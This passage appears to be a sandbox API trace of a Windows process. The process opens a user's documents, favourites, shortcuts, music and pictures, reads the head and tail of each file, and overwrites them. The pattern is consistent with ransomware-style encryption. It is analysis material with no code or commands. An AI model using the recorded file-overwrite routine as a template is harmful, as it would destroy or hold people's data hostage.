hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x660, lpOverlapped=0x0) returned 1 [0179.764] CloseHandle (hObject=0x1dc) returned 1 [0179.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\M1_Vr2bfMKY.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\m1_vr2bfmky.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0179.764] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.764] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x10881 [0179.765] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.765] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.765] ReleaseMutex (hMutex=0x168) returned 1 [0179.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="M1_Vr2bfMKY.odp", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0179.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="M1_Vr2bfMKY.odp", cchWideChar=15, lpMultiByteStr=0x1f7360c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M1_Vr2bfMKY.odp", lpUsedDefaultChar=0x0) returned 15 [0179.765] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0179.766] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf881 [0179.766] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.766] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf881 [0179.766] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.766] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0179.766] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a8fd8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a8fd8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0179.767] CloseHandle (hObject=0x1dc) returned 1 [0179.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0179.767] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.767] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x85 [0179.767] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.768] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.768] ReleaseMutex (hMutex=0x168) returned 1 [0179.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE site on Microsoft.com.url", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0179.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE site on Microsoft.com.url", cchWideChar=28, lpMultiByteStr=0x1f8fc3c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IE site on Microsoft.com.url", lpUsedDefaultChar=0x0) returned 28 [0179.768] ReadFile (in: hFile=0x1dc, lpBuffer=0x2673898, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673898*, lpNumberOfBytesRead=0x331f2bc*=0x85, lpOverlapped=0x0) returned 1 [0179.769] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0179.769] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0179.769] CloseHandle (hObject=0x1dc) returned 1 [0179.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0179.771] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.771] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x85 [0179.771] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.771] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.771] ReleaseMutex (hMutex=0x168) returned 1 [0179.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN.url", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0179.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN.url", cchWideChar=7, lpMultiByteStr=0x1f7ad5c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN.url", lpUsedDefaultChar=0x0) returned 7 [0179.771] ReadFile (in: hFile=0x1dc, lpBuffer=0x2673898, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673898*, lpNumberOfBytesRead=0x331f2bc*=0x85, lpOverlapped=0x0) returned 1 [0179.772] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0179.772] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0179.772] CloseHandle (hObject=0x1dc) returned 1 [0179.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0179.773] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.773] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3a1 [0179.773] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0179.773] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.773] ReleaseMutex (hMutex=0x168) returned 1 [0179.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Downloads.lnk", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0179.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Downloads.lnk", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Downloads.lnk", lpUsedDefaultChar=0x0) returned 13 [0179.773] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x3a1, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x331f2bc*=0x3a1, lpOverlapped=0x0) returned 1 [0180.022] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0180.022] WriteFile (in: hFile=0x1dc, lpBuffer=0x2878b08*, nNumberOfBytesToWrite=0x929, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesWritten=0x331f2d0*=0x929, lpOverlapped=0x0) returned 1 [0180.022] CloseHandle (hObject=0x1dc) returned 1 [0180.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\DXsSdrVpN3W7Cdf\\4whretu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\dxssdrvpn3w7cdf\\4whretu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.023] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.023] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xf52c [0180.023] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.024] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.024] ReleaseMutex (hMutex=0x168) returned 1 [0180.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4whretu.m4a", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4whretu.m4a", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4whretu.m4a", lpUsedDefaultChar=0x0) returned 11 [0180.024] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.025] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xe52c [0180.025] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.026] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xe52c [0180.026] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.026] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.026] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.026] CloseHandle (hObject=0x1dc) returned 1 [0180.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\f73fI\\YjzYBqjyMrT-xrHus0EJ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\f73fi\\yjzybqjymrt-xrhus0ej.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.027] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.027] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3463 [0180.028] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.028] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.028] ReleaseMutex (hMutex=0x168) returned 1 [0180.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YjzYBqjyMrT-xrHus0EJ.wav", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0180.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YjzYBqjyMrT-xrHus0EJ.wav", cchWideChar=24, lpMultiByteStr=0x1f8fc3c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YjzYBqjyMrT-xrHus0EJ.wav", lpUsedDefaultChar=0x0) returned 24 [0180.028] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.029] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2463 [0180.030] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.030] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2463 [0180.030] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.030] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.030] WriteFile (in: hFile=0x1dc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.030] CloseHandle (hObject=0x1dc) returned 1 [0180.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\z lfjHnieP\\79ATMs-_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\z lfjhniep\\79atms-_.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.031] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.032] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x189f1 [0180.032] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.032] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.032] ReleaseMutex (hMutex=0x168) returned 1 [0180.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="79ATMs-_.m4a", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="79ATMs-_.m4a", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="79ATMs-_.m4a", lpUsedDefaultChar=0x0) returned 12 [0180.032] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.033] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x179f1 [0180.034] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.034] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x179f1 [0180.034] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.034] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.035] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.035] CloseHandle (hObject=0x1dc) returned 1 [0180.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\33rJfzjsb1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5kv2w3l69- l7u9zn7\\33rjfzjsb1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.036] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.036] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x11bc [0180.036] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.036] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.036] ReleaseMutex (hMutex=0x168) returned 1 [0180.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="33rJfzjsb1.png", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0180.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="33rJfzjsb1.png", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="33rJfzjsb1.png", lpUsedDefaultChar=0x0) returned 14 [0180.037] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x11bc, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f2bc*=0x11bc, lpOverlapped=0x0) returned 1 [0180.038] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0180.038] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1744, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f2d0*=0x1744, lpOverlapped=0x0) returned 1 [0180.038] CloseHandle (hObject=0x1dc) returned 1 [0180.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\qHOGPTT7bi80Y KG9nP3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\qhogptt7bi80y kg9np3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.039] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.039] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7528 [0180.039] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.040] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.040] ReleaseMutex (hMutex=0x168) returned 1 [0180.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qHOGPTT7bi80Y KG9nP3.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0180.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qHOGPTT7bi80Y KG9nP3.png", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qHOGPTT7bi80Y KG9nP3.png", lpUsedDefaultChar=0x0) returned 24 [0180.040] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.041] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6528 